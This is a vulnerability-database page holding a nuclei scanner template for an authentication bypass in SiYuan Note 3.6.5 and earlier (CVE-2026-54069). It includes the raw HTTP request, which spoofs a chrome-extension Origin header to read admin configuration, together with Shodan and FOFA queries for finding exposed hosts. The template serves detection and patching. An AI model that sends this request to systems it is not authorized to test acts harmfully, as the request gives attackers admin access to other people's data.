Lucene search
+L

SiYuan Note <= 3.6.5 - Authentication Bypass

🗓️ 23 Jul 2026 03:49:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

SiYuan Note up to 3.6.5 allows authentication bypass via spoofed Origin header.

Related
Refs
Code
id: CVE-2026-54069

info:
  name: SiYuan Note <= 3.6.5 - Authentication Bypass
  author: 0x_Akoko
  severity: high
  description: |
    SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.
  impact: |
    Attackers can access all admin API endpoints, enabling full data exfiltration, stored XSS injection, and configuration tampering.
  remediation: |
    Update to SiYuan Note v3.7.0 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-54069
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-54069
    epss-score: 0.00607
    epss-percentile: 0.45363
    cwe-id: CWE-346
  metadata:
    verified: false
    max-request: 1
    vendor: siyuan-note
    product: siyuan
    shodan-query: title:"SiYuan"
    fofa-query: title="SiYuan" || body="siyuan"
  tags: cve,cve2026,siyuan,auth-bypass,unauth

http:
  - raw:
      - |
        POST /api/system/getConf HTTP/1.1
        Host: {{Hostname}}
        Origin: chrome-extension://auth-test
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"code\":0")'
          - 'contains_all(body, "\"conf\"", "\"system\"", "\"kernelVersion\"")'
        condition: and
# digest: 4b0a00483046022100aac3511d1446b1c1b321c8e1443ddebca80e84d899c7cf1ea2505bf5c30279fb02210097c139155f0a756799457fae25b11a3f5c4b57d56e449ebed20a2bf23406a30c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2026 04:18Current
5.3Medium risk
Vulners AI Score5.3
CVSS 49.2
EPSS0.00607
SSVC
32